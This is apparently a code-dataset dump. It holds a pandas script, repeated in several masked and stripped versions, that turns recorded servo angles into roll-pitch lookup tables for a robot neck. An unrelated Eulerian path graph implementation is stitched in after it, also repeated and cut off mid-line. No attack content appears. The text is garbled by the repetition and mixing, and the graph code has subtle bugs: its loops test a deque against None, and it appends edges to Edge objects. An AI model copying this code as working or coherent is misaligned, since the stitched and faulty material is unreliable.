df_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')
df_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')
data = []
row = []
for i in range(-55, 52):
row = []
for j in range(-21, 23):
tup = df_sorted_left[j][i], df_sorted_right[j][i]
row.append(tup)
data.append(row)
df_concat = pd.DataFrame(data=data)
df_concat = df_concat.astype(str)
df_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import pandas as pd
import csv
import numpy as np
import matplotlib.pyplot as plt
df = pd.read_csv(
'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'
)
df = df.apply(pd.to_numeric, errors='coerce')
df = df.dropna()
plt.scatter(df['left_rel_angle'], df['right_rel_angle'])
plt.xlabel('Left servo angle(deg)')
plt.ylabel('Right servo angle(deg)')
plt.title('Plot of left and right servo values')
plt.show()
plt.scatter(df['roll'], df['pitch'])
plt.xlabel('Roll(deg)')
plt.ylabel('Pitch(deg)')
plt.title('Plot of roll and pitch values')
plt.show()
df['roll'] = df['roll'].astype('int8')
df['pitch'] = df['pitch'].astype('int8')
df_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)
df_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()
df_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')
df_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')
df_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']
].apply(tuple, axis=1)
df_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=
'left_rel_angle')
df_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=
'right_rel_angle')
df_sorted_left.bfill(axis='columns', inplace=True)
df_sorted_left.ffill(axis='columns', inplace=True)
df_sorted_right.bfill(axis='columns', inplace=True)
df_sorted_right.ffill(axis='columns', inplace=True)
df_sorted_left = df_sorted_left.astype('int8')
df_sorted_right = df_sorted_right.astype('int8')
df_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')
df_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')
data = []
row = []
for i in range(-55, 52):
row = []
for j in range(-21, 23):
tup = df_sorted_left[j][i], df_sorted_right[j][i]
row.append(tup)
data.append(row)
df_concat = pd.DataFrame(data=data)
df_concat = df_concat.astype(str)
df_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import pandas as pd
import csv
import numpy as np
import matplotlib.pyplot as plt
#import csv file with recorded left, right servo angles and their corresponding roll and pitch values
df = pd.read_csv('C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv') #change address to csv file address
#remove all the NaN rows
df = df.apply (pd.to_numeric, errors='coerce')
df = df.dropna()
#scatter plot of all avaiable left and right servo angles
plt.scatter(df['left_rel_angle'], df['right_rel_angle'])
plt.xlabel('Left servo angle(deg)')
plt.ylabel('Right servo angle(deg)')
plt.title('Plot of left and right servo values')
plt.show()
#scatter plot of all avaiable roll and pitch angles
plt.scatter(df['roll'], df['pitch'])
plt.xlabel('Roll(deg)')
plt.ylabel('Pitch(deg)')
plt.title('Plot of roll and pitch values')
plt.show()
#change to integer
df['roll'] = df['roll'].astype('int8')
df['pitch'] = df['pitch'].astype('int8')
#sort df by roll(ascending) and then pitch(ascending)
df_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)
#group dataframe by roll and pitch values (i.e. collect the data sets with the same roll and pitch outputs) and calculate the mean for left and right servo values
df_sorted = df.groupby(['pitch','roll']).mean().reset_index()
#change left and right servo values to integer
df_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')
df_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')
#group left and right servo value together into a tuple
df_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']].apply(tuple, axis=1)
#change table format to row index:pitch, column index: roll, create two tables with left and right servo angles
df_sorted_left = df_sorted.pivot(index ='pitch', columns='roll', values='left_rel_angle')
df_sorted_right = df_sorted.pivot(index ='pitch', columns='roll', values='right_rel_angle')
#for every cell that is empty, write it a value of it's left or right most adjacent available cell
df_sorted_left.bfill(axis ='columns', inplace = True)
df_sorted_left.ffill(axis ='columns', inplace = True)
df_sorted_right.bfill(axis ='columns', inplace = True)
df_sorted_right.ffill(axis ='columns', inplace = True)
#change table type to integer
df_sorted_left = df_sorted_left.astype('int8')
df_sorted_right = df_sorted_right.astype('int8')
#save the left and right servo table files locally (debugging step)
df_sorted_left.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/left_test.csv')
df_sorted_right.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/right_test.csv')
#create empty data table and row
data = []
row = []
for i in range(-55,52): #for i in pitch range (rows); check the left_test.csv or right_test.csv file to find out the range of pitch values
row = []
for j in range(-21, 23): #for j in roll range (column); check the left_test.csv or right_test.csv file to find out the range of pitch values
tup = (df_sorted_left[j][i], df_sorted_right[j][i]) #create a tuple in the format of (left_serve_angle, right_servo_angle)
# print(i,j)
# print(tup)
row.append(tup) #apend tuple to row
data.append(row) #append row to data
df_concat = pd.DataFrame(data=data)
# df_concat = df_concat.applymap(str)
df_concat = df_concat.astype(str)
df_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
# df_concat = df_concat.str.replace('(','{')
# df_concat = df_concat.str.replace(')','},')
# df_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/tabblepeggy_2_angle_reference_TEST.csv')
'''
Run the next two lines after you open the csv file and edited the following:
1. change all "(" to "{"
2. change all ")" to "}"
3. delete the first column (index column)
'''
# df_concat = pd.read_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
# np.savetxt(r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2deg_1.h', df_concat, fmt='%s', newline="}, \n {", header="#ifndef NECK_H_\n#define NECK_H_")
|
flexible
|
{
"blob_id": "fd7961d3a94b53ae791da696bb2024165db8b8fc",
"index": 5354,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\n<mask token>\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\n<mask token>\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\n<mask token>\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\n<mask token>\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\n<mask token>\n",
"step-3": "<mask token>\ndf = pd.read_csv(\n 'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'\n )\ndf = df.apply(pd.to_numeric, errors='coerce')\ndf = df.dropna()\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\ndf['roll'] = df['roll'].astype('int8')\ndf['pitch'] = df['pitch'].astype('int8')\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\ndf_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']\n ].apply(tuple, axis=1)\ndf_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=\n 'left_rel_angle')\ndf_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=\n 'right_rel_angle')\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\ndf_sorted_left = df_sorted_left.astype('int8')\ndf_sorted_right = df_sorted_right.astype('int8')\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\ndata = []\nrow = []\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\ndf_concat = pd.DataFrame(data=data)\ndf_concat = df_concat.astype(str)\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\n<mask token>\n",
"step-4": "import pandas as pd\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\ndf = pd.read_csv(\n 'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'\n )\ndf = df.apply(pd.to_numeric, errors='coerce')\ndf = df.dropna()\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\ndf['roll'] = df['roll'].astype('int8')\ndf['pitch'] = df['pitch'].astype('int8')\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\ndf_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']\n ].apply(tuple, axis=1)\ndf_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=\n 'left_rel_angle')\ndf_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=\n 'right_rel_angle')\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\ndf_sorted_left = df_sorted_left.astype('int8')\ndf_sorted_right = df_sorted_right.astype('int8')\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\ndata = []\nrow = []\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\ndf_concat = pd.DataFrame(data=data)\ndf_concat = df_concat.astype(str)\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\n<mask token>\n",
"step-5": "import pandas as pd\r\nimport csv\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#import csv file with recorded left, right servo angles and their corresponding roll and pitch values\r\ndf = pd.read_csv('C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv') #change address to csv file address\r\n\r\n#remove all the NaN rows\r\ndf = df.apply (pd.to_numeric, errors='coerce')\r\ndf = df.dropna()\r\n\r\n#scatter plot of all avaiable left and right servo angles\r\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\r\nplt.xlabel('Left servo angle(deg)')\r\nplt.ylabel('Right servo angle(deg)')\r\nplt.title('Plot of left and right servo values')\r\nplt.show()\r\n\r\n#scatter plot of all avaiable roll and pitch angles\r\nplt.scatter(df['roll'], df['pitch'])\r\nplt.xlabel('Roll(deg)')\r\nplt.ylabel('Pitch(deg)')\r\nplt.title('Plot of roll and pitch values')\r\nplt.show()\r\n\r\n#change to integer\t\r\ndf['roll'] = df['roll'].astype('int8')\r\ndf['pitch'] = df['pitch'].astype('int8')\r\n\r\n#sort df by roll(ascending) and then pitch(ascending) \r\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\r\n\r\n#group dataframe by roll and pitch values (i.e. collect the data sets with the same roll and pitch outputs) and calculate the mean for left and right servo values\r\ndf_sorted = df.groupby(['pitch','roll']).mean().reset_index()\r\n\r\n#change left and right servo values to integer\r\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\r\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\r\n\r\n#group left and right servo value together into a tuple\r\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']].apply(tuple, axis=1)\r\n\r\n#change table format to row index:pitch, column index: roll, create two tables with left and right servo angles\r\ndf_sorted_left = df_sorted.pivot(index ='pitch', columns='roll', values='left_rel_angle')\r\ndf_sorted_right = df_sorted.pivot(index ='pitch', columns='roll', values='right_rel_angle')\r\n\r\n#for every cell that is empty, write it a value of it's left or right most adjacent available cell\r\ndf_sorted_left.bfill(axis ='columns', inplace = True)\r\ndf_sorted_left.ffill(axis ='columns', inplace = True)\r\ndf_sorted_right.bfill(axis ='columns', inplace = True)\r\ndf_sorted_right.ffill(axis ='columns', inplace = True)\r\n\r\n#change table type to integer\r\ndf_sorted_left = df_sorted_left.astype('int8')\r\ndf_sorted_right = df_sorted_right.astype('int8') \r\n\r\n#save the left and right servo table files locally (debugging step)\r\ndf_sorted_left.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\r\ndf_sorted_right.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\r\n\r\n#create empty data table and row \r\ndata = []\r\nrow = []\r\n\r\nfor i in range(-55,52): #for i in pitch range (rows); check the left_test.csv or right_test.csv file to find out the range of pitch values \r\n\trow = []\r\n\tfor j in range(-21, 23): #for j in roll range (column); check the left_test.csv or right_test.csv file to find out the range of pitch values\r\n\t\ttup = (df_sorted_left[j][i], df_sorted_right[j][i]) #create a tuple in the format of (left_serve_angle, right_servo_angle)\r\n\t\t# print(i,j)\r\n\t\t# print(tup)\r\n\t\trow.append(tup) #apend tuple to row\r\n\tdata.append(row) #append row to data\r\n\r\ndf_concat = pd.DataFrame(data=data)\r\n# df_concat = df_concat.applymap(str)\r\ndf_concat = df_concat.astype(str)\r\ndf_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\r\n\r\n# df_concat = df_concat.str.replace('(','{')\r\n# df_concat = df_concat.str.replace(')','},')\r\n# df_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/tabblepeggy_2_angle_reference_TEST.csv')\r\n\r\n'''\r\nRun the next two lines after you open the csv file and edited the following:\r\n1. change all \"(\" to \"{\"\r\n2. change all \")\" to \"}\"\r\n3. delete the first column (index column) \r\n'''\r\n# df_concat = pd.read_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\r\n# np.savetxt(r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2deg_1.h', df_concat, fmt='%s', newline=\"}, \\n {\", header=\"#ifndef NECK_H_\\n#define NECK_H_\")\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class EulerianPath:
<|reserved_special_token_0|>
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return (
f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'
)
def __init__(self, g):
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
if odd_degree_vertices > 2:
return
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
self.get_path().append(v)
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \npath={self.get_path()}'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EulerianPath:
_path = deque()
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return (
f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'
)
def __init__(self, g):
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
if odd_degree_vertices > 2:
return
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
self.get_path().append(v)
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \npath={self.get_path()}'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EulerianPath:
_path = deque()
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return (
f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'
)
def __init__(self, g):
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
if odd_degree_vertices > 2:
return
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
self.get_path().append(v)
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \npath={self.get_path()}'
def main():
g = Graph(13)
with open('../resources/tinyG.txt') as f:
for line in f.readlines():
vertices = ' '.join(line.splitlines()).split(' ')
if len(vertices) < 2:
continue
else:
v1, v2 = int(vertices[0]), int(vertices[1])
g.add_edge(v1, v2)
print(g)
euler = EulerianPath(g)
print(euler)
print('Eulerian path: ')
if euler.has_eulerian_path():
for v in euler.path():
print(f'{v} ')
print()
else:
print('None')
print()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from graphs.edge import Edge
from graphs.graph import Graph
from collections import deque, defaultdict
class EulerianPath:
_path = deque()
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return (
f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'
)
def __init__(self, g):
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
if odd_degree_vertices > 2:
return
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
self.get_path().append(v)
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \npath={self.get_path()}'
def main():
g = Graph(13)
with open('../resources/tinyG.txt') as f:
for line in f.readlines():
vertices = ' '.join(line.splitlines()).split(' ')
if len(vertices) < 2:
continue
else:
v1, v2 = int(vertices[0]), int(vertices[1])
g.add_edge(v1, v2)
print(g)
euler = EulerianPath(g)
print(euler)
print('Eulerian path: ')
if euler.has_eulerian_path():
for v in euler.path():
print(f'{v} ')
print()
else:
print('None')
print()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
"""
eulerian_path.py
An Eulerian path, also called an Euler chain, Euler trail, Euler walk, or "Eulerian" version of any of these
variants, is a walk on the graph edges of a graph which uses each graph edge in the original graph exactly once.
A connected graph has an Eulerian path iff it has at most two graph vertices of odd degree.
The EulerianPath class represents a data type
* for finding an Eulerian path in a graph.
* An Eulerian path is a path (not necessarily simple) that
* uses every edge in the graph exactly once.
* This implementation uses a non-recursive depth-first search.
* The constructor takes Theta(E + V) time in the worst
* case, where E is the number of edges and V is
* the number of vertices.
* Each instance method takes Theta(1) time.
* It uses Theta(E + V) extra space in the worst case
* (not including the digraph).
"""
from graphs.edge import Edge
from graphs.graph import Graph
from collections import deque, defaultdict
class EulerianPath:
_path = deque() # stack
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return f'<{self.__class__.__name__}(' \
f'v={super().get_v()}, ' \
f'w={super().get_w()}, ' \
f'weight={super().weight()}, ' \
f'_is_used={self.get_is_used()})>'
def __init__(self, g):
# find vertex from which to start potential Eulerian path:
# a vertex v with odd degree(v) if it exits;
# otherwise a vertex with degree(v) > 0
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
# Eulerian path iff it has at most two graph vertices of odd degree
if odd_degree_vertices > 2:
return
# special case for graph with 0 edges (has a degenerate Eulerian Path)
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
# careful with self loops
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
# greedily search through edges in iterative DFS style
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
# push vertex with no more leaving edges to path
self.get_path().append(v)
# check if all edges are used
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \n' \
f'path={self.get_path()}'
def main():
g = Graph(13)
with open("../resources/tinyG.txt", ) as f:
for line in f.readlines():
vertices = " ".join(line.splitlines()).split(' ')
if len(vertices) < 2:
continue
else:
v1, v2 = int(vertices[0]), int(vertices[1])
g.add_edge(v1, v2)
print(g)
euler = EulerianPath(g)
print(euler)
print('Eulerian path: ')
if euler.has_eulerian_path():
for v in euler.path():
print(f'{v} ')
print()
else:
print('None')
print()
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "73e6930c6866d3ccdbccec925bfc5e7e4702feb9",
"index": 8348,
"step-1": "<mask token>\n\n\nclass EulerianPath:\n <mask token>\n\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return (\n f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'\n )\n\n def __init__(self, g):\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n if odd_degree_vertices > 2:\n return\n if s == -1:\n s = 0\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n self.get_path().append(v)\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\npath={self.get_path()}'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass EulerianPath:\n _path = deque()\n\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return (\n f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'\n )\n\n def __init__(self, g):\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n if odd_degree_vertices > 2:\n return\n if s == -1:\n s = 0\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < 